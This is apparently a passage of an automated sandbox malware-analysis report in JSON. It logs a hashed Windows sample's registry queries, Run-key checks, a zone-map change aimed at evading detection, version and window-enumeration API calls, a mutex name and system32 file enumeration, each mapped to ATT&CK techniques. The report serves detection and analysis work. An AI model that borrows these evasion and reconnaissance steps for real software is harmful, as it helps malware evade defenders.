\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"F489E33D812F81D343BA0FC6837DB386D06F3D7AFD3B42C6136DA690E466548C\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CONNECT\"; Key: \"VALUENAME\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"CHECKSCAN\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"CHECKSCAN\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"MAXRPCSIZE\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"OOBEINPROGRESS\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"SYSTEMSETUPINPROGRESS\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"CEIPENABLE\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"SYNCMODE5\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\5.0\\CACHE\"; Key: \"SESSIONSTARTTIMEDEFAULTDELTASECS\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\"; Key: \"CATEGORY\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\"; Key: \"NAME\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb407788e92e0000f0fd7f9a5c7e7700e0fd7f18b8120044f0fd7f00000000400000003f0000002100000000f0fd7f0cb81200c15c7e77608285772100000000f0fd7f9a5c7e7700e0fd7f30b8120057897d778083857713177875d8eb4077 (UID: 00000000-00005940)\n \"regsrv32.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100009f1877756f13c80300000000e0c22a760050fd7fb312c8037cee12000000000078ff1200bd067975cb5fad76feffffff7cbd777502df2a76ffffffff000000000000000020df400040f11200000000000000000048f112004cf11200e3084100000000000000000020df400040f11200 (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006004)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"OpenMutexA\" with parameter \"Aeb-75\" - (UID: 00000000-00005940)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"cmd.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004236)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"IsWow64Process\" with parameter \"5940\" - (UID: 00000000-00005940)\n \"regsrv32.exe\" called \"IsWow64Process\" with parameter \"6004\" - (UID: 00000000-00006004)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-152", "type": 6, "relevance": 3, "name": "Calls an API typically used to enumerate active windows", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"EnumWindows\" with parameter \"0\" - (UID: 00000000-00005940)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000094ed1200000000008e000000e4ed1200feffffff6ced1200cf007e77d6007e77ffca98778e00000047000000e4ed12000000000040ed120000000000a8ed1200 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002e0050382e004b382e000000000000000000000029000000000164d2120000000000c8df120095e17977bb35f700feffffff435c7d7750597d77aa000000b80000004a382e0048382e00ecd3120024d81200000000000000000000000000000000000000000000000000e0140000000029001c5c7c7760d87775ffffffff170000009cd3120024000000030000008cd81200b8dd120024d8120086000000c8d3120096ed7d7772382e00a06a537586000000ecd3120024d812000000000086008800a06a5375ecd31200916c537572382e00a06a5375a06a53755cd8120002020000 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360011e6c807accc12006d829877dc42300004010000 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000640033003400330062006100300066006300360038003300370064006200330038003600640030003600660033006400370061006600640033006200340032006300360031003300360064006100360039003000650034003600360035003400380063002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2b7d77cb909877d8eb4077ac01290000002900000000000000000016008e00f30408210000000000000000000000000000000017008900f304082100000000000000000870290000000000200000000000000000000000 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600f5ecc80788c612006d829877d41e320004010000 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600f5ecc80788c612006d829877cc1f320004010000 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003200f83b0000ff07000000002900000000007f070000c4002900d82f29001d4b0000f8c5120067e57a7700002900f8263200000000000000290000000000f826320000000000c94a008380000000a0293200c400290080a82f00003b00000000290000000000f82632000017000000002900f0233200f83b0000ff07000000002900000000007f070000c40029007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600f5ecc80788c612006d8298777421320004010000 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003200f83b0000ff07000000002900000000007f070000c4002900d82f2900e84a0000f8c5120067e57a7700002900a0283200000000000000290000000000a028320000000000944a00de80000000482b3200c400290008a82f00003b00000000290000000000a0283200001700000000290098253200f83b0000ff07000000002900000000007f070000c40029007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600f5ecc80788c612006d829877a422320004010000 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003200f83b0000ff07000000002900000000007f070000c4002900d82f2900c24a0000f8c5120067e57a7700002900d0293200000000000000290000000000d0293200000000006e4a002480000000782c3200c400290008a82f00003b00000000290000000000d02932000017000000002900c8263200f83b0000ff07000000002900000000007f070000c40029007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600f5ecc80788c612006d829877d423320004010000 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003200f83b0000ff07000000002900000000007f070000c4002900d82f29009c4a0000f8c5120067e57a7700002900002b3200000000000000290000000000002b320000000000484a000280000000a82d3200c400290008a82f00003b00000000290000000000002b32000017000000002900f8273200f83b0000ff07000000002900000000007f070000c40029007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600f5ecc80788c612006d829877fc24320004010000 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003200f83b0000ff07000000002900000000007f070000c4002900d82f2900774a0000f8c5120067e57a7700002900282c3200000000000000290000000000282c320000000000234a006980000000d02e3200c400290008a82f00003b00000000290000000000282c3200001700000000290020293200f83b0000ff07000000002900000000007f070000c40029007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600f5ecc80788c612006d8298772c26320004010000 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003200f83b0000ff07000000002900000000007f070000c4002900d82f2900514a0000f8c5120067e57a7700002900582d3200000000000000290000000000582d320000000000fd4900b48000000000303200c400290008a82f00003b00000000290000000000582d32000017000000002900502a3200f83b0000ff07000000002900000000007f070000c40029007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600f5ecc80788c612006d8298775c2f320004010000 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003200f83b0000ff07000000002900000000007f070000c4002900d82f29002b490000f8c5120067e57a7700002900883632000000000000002900000000008836320000000000d748009f8000000030393200c400290008a82f00003b0000000029000000000088363200001700000000290080333200f83b0000ff07000000002900000000007f070000c40029007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600f5ecc80788c612006d8298778430320004010000 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003200f83b0000ff07000000002900000000007f070000c4002900d82f290006490000f8c5120067e57a7700002900b0373200000000000000290000000000b037320000000000b24800fa80000000583a3200c400290008a82f00003b00000000290000000000b03732000017000000002900a8343200f83b0000ff07000000002900000000007f070000c40029007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600f5ecc80788c612006d829877bc31320004010000 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000a8ad2f00c8cf1200b344de6c81d08276000000000000000000000000000000000000000000000000c402000000000000000000000000000059e5c807bab6df0784d412005ecb8076c402000000000000005d7e76e0d612000e5d7e7678d21200dcaa8276010000000000000072000000ffffffffffffffff00d0120078020000000000002500000000d012007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600a5fac80758d012006d829877f457320004010000 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000ffff15001501bc000000620b807600000000087029000000000050000000745a31000200000020722c000000000001000008e8a12e0030742900380b80768cce1200020000000017000000002900e0573200f83b0000ff07000000002900000000007f070000c4002900d82f2900004500006ccf120067e57a7700002900e05732000000000000002900000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360011e5c807accf12006d829877f457320004010000 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360039e2c807c4c812006d829877d45b320004010000 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000290000b83200000000003e00003e340000c028ba3200a0c9320048143000f0010000000029000400000000b83200fcda120004647d7738012900e0637d776ffd9877000000000000290008b832006dd12a76ae883b076cae58760000000000000000f0020000a0c93200d82f29000100000000002900500129000c00000008b83200d82f29000200000218000000c93600ff820000000000000000000000030000009cda1200820000007f07000000000000c93600ff02000000c0753276a0c9320000000000c0753276b8da1200e830290000000000d82f290010db1200ff2b7d77 (UID: 00000000-00005940)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005940)\n \"regsrv32.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00006004)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetWindowTextA\" (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetWindowTextA\" with parameter \"CiceroUIWndFrame\" - (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetWindowTextA\" with parameter \"Start\" - (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetWindowTextA\" with parameter \"Network Flyout\" - (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetWindowTextA\" with parameter \"Task Switching\" - (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetWindowTextA\" with parameter \"Start menu\" - (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetWindowTextA\" with parameter \"TF_FloatingLangBar_WndTitle\" - (UID: 00000000-00005940)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005940)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\R2473.BAT\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\R2473.BAT\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\*.* (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"FindNextFileW\" with parameter 0409 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"FindNextFileW\" with parameter 12520437.cpx (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"FindNextFileW\" with parameter 12520850.cpx (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"FindNextFileW\" with parameter 7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"FindNextFileW\" with parameter 7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"FindNextFileW\" with parameter aaclient.dll (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"FindNextFileW\" with parameter accessibilitycpl.dll (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"FindNextFileW\" with parameter ACCTRES.dll (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"FindNextFileW\" with parameter acledit.dll (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"FindNextFileW\" with parameter aclui.dll (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"FindNextFileW\" with parameter acmigration.dll (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"FindNextFileW\" with parameter acppage.dll (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"FindNextFileW\" with parameter acproxy.dll (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"FindNextFileW\" with parameter ActionCenter.dll (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"FindNextFileW\" with parameter ActionCenterCPL.dll (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"FindNextFileW\" with parameter ActionQueue.dll (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"FindNextFileW\" with parameter activeds.dll (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"FindNextFileW\" with parameter activeds.tlb (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"FindNextFileW\" with parameter actxprxy.dll (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"FindNextFileW\" with parameter AdapterTroubleshooter.exe 